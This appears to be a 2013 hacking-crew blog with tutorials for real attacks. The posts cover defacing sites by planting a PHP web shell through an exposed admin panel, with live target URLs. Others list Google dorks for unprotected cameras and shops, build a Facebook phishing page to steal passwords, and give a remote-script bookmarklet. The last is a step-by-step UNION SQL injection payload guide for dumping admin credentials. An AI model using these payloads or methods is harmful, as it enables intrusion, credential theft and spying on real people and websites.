Monday, 30 December 2013

Black CyberSec Crew Shell v1.0 [Released]





This is the first version of Black CyberSec Crew Shell. During the making of this shell, some of the BCC has helped me a lot especially Tiada Nama and Tony Mota. Thanks guys for your help and support ^_^

Wanna try our shell? Feel free to download it from HERE



By Black Eagle

Wednesday, 25 December 2013

Deface Website Using Inspect Element



This method sounds kinda stupid for those who never heard it, but trust me, it really works :)



Finding Vulnerable Target :

Dorks:

intext:"Powered By: Multi Profit Websites"
inurl:/index_ebay.php
inurl:/index_amazon.php
inurl:/index_rrfc.php
inurl:/index_info.php
inurl:/index_youtube.php
inurl:/index_rss.php


1- Paste any of those dork on Google, and choose any site.

2- Add /admin/ at the end of the site.

Example :

http://martincommodities.com/sitemap.php

to

http://martincommodities.com/admin/


You will get the admin login. Here's the example



If you didn't get the login page, it means the site have been patched or in other word, not vulnerable.

Exploiting Target

1- Once you have the admin login, right click on your mouse, and choose Inspect Element. Then a console like this will appear.





2- Okay, right now, we need to find 

<input type="hidden" name="do_type" value="admin_setting_read">  .

 As you noticed, i highlighted the word hidden , this is because we need to change it from "hidden" to "text" and there will be "admin_setting_read" . Change "read" become "write"so it would be like this "admin_setting_write

Once you hit enter, you will get something like this.




Hit enter, and you will get something like the picture above



Click Login and you will be redirect to the admin page.



4- Alright, now we need to find "Add/Remove New Navigation Page" and click on it. And you will get something like "Enter a name for your new navigation..." or semothing similar. Put your shell name and click Add New Navigation Page




5- Scroll down the page to check if our shell name is already exist or not. If it is, replace our shell name from shellname.php.html to /shellname.php 


From



To



6- Now, go to menu Edit Navigation Page, and one more time, using inspect element, we change our shell name from shell.php.html  to shell.php



7- Still in the same page, go to "Enter a page title...." and enter our shell name. And at URL for this page , enter main_pages/shellname.php as in the picture below.



8- Now it's time to put the shell script. Before you enter your shell script, hit enter 3 times and paste your shell script. After that, before saving, hit enter again 3 times. And click Save Edited Navigation




9- If we get something like the picture below, it means we successfully execute the shell.


10- The final step, to view your shell, add /maim_pages/shellname.php at the end of the site URL.

Example:

www.site.com/main_pages/bcc.php




*Additional information
Bypass Login Error
If you failed to login and get something like this 

There's a solution. Just follow everything  i do in the video below.


video


Live Demo :

http://www.socialmediabusinesssuccesstraining.com/index.htm
http://www.trainingforsocialmediauniversity.com/index.html
http://starlitebooks.com/index.php
http://www.prostatedu.info/
http://www.menshealthhelpblog.com/
http://www.diabetesedu.info/


Video Tutorial:
video



Part I



Part II


That's all tutorial from me ^_^

Monday, 23 December 2013

UnProtected Camera Dorks




Procedure :

1- Copy any of these dorks and paste on Google

2- Choose any site, and you will get the view from an unprotected camera. :D


Dorks :

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
intitle:start inurl:cgistart
intitle:”live view” intitle:axis
liveapplet
intitle:snc-z20 inurl:home/
intitle:liveapplet
intitle:”i-Catcher Console - Web Monitor”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
intitle:”Live View / - AXIS 206M”
inurl:”MultiCameraFrame?Mode=Motion”
allintitle:”Network Camera NetworkCamera”
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:”netcam live image”
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com

intitle:”Toshiba Network Camera” user login

By Black Eagle

Saturday, 21 December 2013

Credit Card Dorks




inurl:".php?cat="+intext:"Paypal"+site:UK



inurl:".php?cat="+intext:"/Buy Now/"+site:.net


inurl:".php?cid="+intext:"online+betting"


inurl:".php?id=" intext:"View cart"


inurl:".php?id=" intext:"Buy Now"


inurl:".php?id=" intext:"add to cart"


inurl:".php?id=" intext:"shopping"


inurl:".php?id=" intext:"boutique"


inurl:".php?id=" intext:"/store/"


inurl:".php?id=" intext:"/shop/"


inurl:".php?id=" intext:"toys"


inurl:".php?cid="


inurl:".php?cid=" intext:"shopping"


inurl:".php?cid=" intext:"add to cart"


inurl:".php?cid=" intext:"Buy Now"


inurl:".php?cid=" intext:"View cart"


inurl:".php?cid=" intext:"boutique


inurl:".php?cid=" intext:"/store/"


inurl:".php?cid=" intext:"/shop/"


inurl:".php?cid=" intext:"Toys"


inurl:".php?cat="


inurl:".php?cat=" intext:"shopping"


inurl:".php?cat=" intext:"add to cart"


inurl:".php?cat=" intext:"Buy Now"


inurl:".php?cat=" intext:"View cart"


inurl:".php?cat=" intext:"boutique


" inurl:".php?cat=" intext:"/store/"


inurl:".php?cat=" intext:"/shop/"


inurl:".php?cat=" intext:"Toys"


inurl:".php?catid="


inurl:".php?catid=" intext:"View cart"


inurl:".php?catid=" intext:"Buy Now"


inurl:".php?catid=" intext:"add to cart"


inurl:".php?catid=" intext:"shopping"


inurl:".php?catid=" intext:"boutique"


inurl:".php?catid=" intext:"/store/"


inurl:".php?catid=" intext:"/shop/"


inurl:".php?catid=" intext:"Toys"


inurl:".php?categoryid="


inurl:".php?categoryid=" intext:"View cart"


inurl:".php?categoryid=" intext:"Buy Now"


inurl:".php?categoryid=" intext:"add to cart"


inurl:".php?categoryid=" intext:"shopping"


inurl:".php?categoryid=" intext:"boutique"


inurl:".php?categoryid=" intext:"/store/"


inurl:".php?categoryid=" intext:"/shop/"


inurl:".php?categoryid=" intext:"Toys"


inurl:".php?pid="


inurl:".php?pid=" intext:"shopping"


inurl:".php?pid=" intext:"add to cart"


inurl:".php?pid=" intext:"Buy Now"


inurl:".php?pid=" intext:"View cart"


inurl:".php?pid=" intext:"boutique"

You also can download them HERE for more dorks :)

How To Hack Facebook Using Phishing Method



Lately, many facebook user want to hack other facebook users' account especially jealous Girlfriend or Boyfriend. This method is quite easy and can make you get a lot of email and password.





Understanding the Attack Method

A phishing page is used to steal login credentials and other valuable information such as credit card details.A phishing page appears to be exact copy of a legitimate page but it is coded for stealing.
   

Preparing the Weapons

1- First, download the files HERE 

2- You need to have a web hosting account. Just register yourself at any of free webhosting site. This is my suggestion :

000webhost

110mb 
Ripway
SuperFreeHost
Freehostia
Freeweb7 
t35
Awardspace 
PHPNet
Free Web Hosting Pro 
ProHosts
FreeZoka
AtSpace 





As for me, I will use 000webhost, so firstly, go to the webpage and register yourself there. 

I suggest you to choose free subdomain. Just write the name of your website in the column. Your website name must be interesting, so it can makes the victim attracted. Fill up the forms, fill in the recaptcha given , agree with their term of service and then click Create My Account.

A verification email will be send to your email account. Verify and login to your 000webhost account. Once you have logged in, you will see List of your domain . Click Go To Cpanel.
Scroll down the page, you will see the File Manager. The icon is like this



Click your file manager, and you will be redirect here


After that, click public_html folder and you will see 2 files, such as default.php and .htaccess

Click Upload and you will get this


At here, 

Click choose file and browse for the FacebookPhishing.zip that you have downloaded.
Upload them. And you will get something like this



Now your phishing site have DONE! :)
Go to your site, and you will get a clone of Facebook login page :D




Attacking 

Now, what you need is to spread/send your phishing site link to your victims. Once they have logged in a text file named pasu.txt will be generated. The victims' email and password will be there. Go to your file manager and check the text file. It would be somethin like this


Yeay! Now you have hacked a Facebook Account ^_^

That's all Phishing Tutorial from me. More Facebook hacking trick will be posted soon :)
Leave a comment if you have any query, or you can contact me on Facebook :)


Thursday, 19 December 2013

Silentum Uploader



Finding Vulnerable Site

Dorks: inurl:upload.php intext:"htm html" site:.com
              intext:Powered by: Silentum Uploader

1- Copy and paste any of these dork on Google.

2- Choose any site do you want to make as a target.

3- You will get something like this or something similar.



Exploiting Target

1- Choose your file and click upload.

2- To view your file, sometimes it's depends on your site. 

For Example, my target is

 when i uploaded my files, my files will be at


The path to the file is www.site.com/path/upload/filename.html .
Sometimes you need to add /file/filename.html.
It's depends on your site :) Make a try then :D


That's all tutorial for today.


Tuesday, 17 December 2013

How To Detect Fake Facebook Account?



Nowadays, we often get so many friend request especially from girls, but there is no way to identify that account is fake or original. So don't worry, actually there is a way to know whether it is real or fake.





So this is a Facebook account which named by Tha Senged. To verify  wether this account real or fake, we need to go to HERE and click on camera image.






So when you click on search by image you will get popup like below image.





 Now go to that profile, right click on image and click on copy image URL


Later, paste the image URL in the search box



When you hit enter, you will get some related image search



Now that we can know whether the account is real or not. My advice for you, when you want to add any beautiful or handsome individu on Facebook, better check it first whether it's real or fake.
Those guys might be spying / stalking  on your profile and steal personal information and interrupt your privacy such as stealing photos and etc.


Monday, 16 December 2013

Facebook Auto Tool



Lately, many Facebook user ask me about the auto script such as auto invite, auto post and etc. No need to worry. Now, only with one javascript, you will get awesome Facebook Auto Tools. This tools is not belongs to me or any of Black CyberSec Crew members. Everything is owned by DonNazmi. I'm just sharing.

Browser Type : Mozilla Firefox

Javascript : javascript:(function(){document.body.appendChild(document.createElement('script')).src='https://codegooglesite.googlecode.com/files/facebookautotools.js';})();


1- Open your Firefox browser and right click on the Bookmarks Bar. Click NEW BOOKMARK





2- Put any name you like. And, at the location field, paste the javascript above and click ADD.





3- Click you new Auto Tool bookmark and you will get something like this.



4- Just Click OK and enjoy Facebook Auto Tool :)





SQL Injection Tutorial [Part 1]





1.Searching the Target and the Admin Password

a)Searching for the target

1- We need to find our target using these dorks. Copy any of the dork and paste it in google. :)


b)Finding the Admin Password

1- Check for vulnerabilities

For example, if we have our target site is like this:

http://www.site.com/index.php?id=5

To check the vulnerability, we need to put ' (quote) at the end of the URL. So our target will looks like this.

http://www.site.com/index.php?=5'

Hit enter and if we get an error such as,

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

or something similar, that means the site is vulnerable for SQL Injection :)




2- Finding the number of columns

To find the number of columns, we need to use statement ORDER BY. This statement tells database how to order the result. We need to keep changing the number until we get an error.

http://www.site.com/index.php?id=5 order by 1/* || No Error ||

http://www.site.com/index.php?id=5 order by 2/* || No Error ||

http://www.site.com/index.php?id=5 order by 3/* || No Error ||

http://www.site.com/index.php?id=5 order by 4/* || Error ||


If we get and error like, “ Unknown column '4' in 'order clause' “ or something almost the same, that means the site has 3 column because we got error on column 4.




3- Union Function

With union, we can select more data in one sql statement.


For example we have:

http://www.site.com/index.php?id=5 union all select 1,2,3/*

We need to write 1,2, until 3 because we already found that the number of columns are 3

If your site have 10 columns, you need to write from 1 until 10.

Example :

http://www.site.com/index.php?id=5 union all select 1,2,3,4,5,6,7,8,9,10/*

After we hit enter and we get some numbers on the screen such as 1 or 2 or 3, then the UNION works. :)

If it's not working, try to replace /* with --




4- Check for MySQL version

Let say we have the number 2 on the screen, to check for the MySQL version, we need to replace 2 with @@version or ()version and we will get something like 4.12.33-log or 5.0.45 or something similar.

The statement should look like this,

http://www.site.com/index.php?id=5 union all select 1,@@version,3/*

But if we get an error such as

"union + illegal mix of collations (IMPLICIT + COERCIBLE) …"

We need to put convert() function

Example:

http://www.site.com/index.php?id=5 union all select 1,convert(@@version using latin1),3/*

or you also can use unhex() and hex()

Example:

http://www.site.com/index.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get the MySQL version.






5- Getting table and column name

If the MySQL version is lower than 5 such as 4.1.33 or 4.1.12.

The common table names are :

user/s , admin/s , member/s

The common column names are :

username , user , usr , user_name , password , pass , passwd , pwd and etc


For example :

http://www.site.com/index.php?id=5 union all select 1,2,3 from admin/*

If we can see numbers displayed on the screen like before, that means table admin is exist.




As now, we need to check the column name.

http://www.site.com?index.php?id=5 union all select 1,username,3 from admin/*

If you get an error, you need to try other column name :P

The username that we will get on our screen would be admin or superadmin or etc.




Now we are going to check the password column. :D

http://www.site.com/index.php?id=5 union all select 1,password,3 from admin/*

If you got an error again, you need to try another column name. :P

We will get the password on the screen in hash or plain-text. It depends on how the database is set up.

*If you just can't guess the right table name, you can always try mysql.user (default)

It has the user password columns.

So it would be:

http://www.site.com/index.php?id=5 union all 1,concat(user,0x3a,password),3 from mysql.user/*

Now, to complete the query to make it looks nice, we need to use concat() function. This function joins strings :)

Example:

http://www.site.com/index.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

* I put 0x3a, this is the hex value for colon “ :

We also can replace 0x3a with char(85) .

Char(85) is the ascii value for colon too :)

Example :

http://www.site.com/index.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

So, we will get username:password displayed on the screen.

For example:

admin:admin

or

superadmin:admin

or

admin:passwordinhash



When we have the username and password, we can login into the site as the admin.

Alright, I think that's all my tutorial for SQL Injection :) I will explain about finding the tables and column for MySQL version that is > 5 in another post :D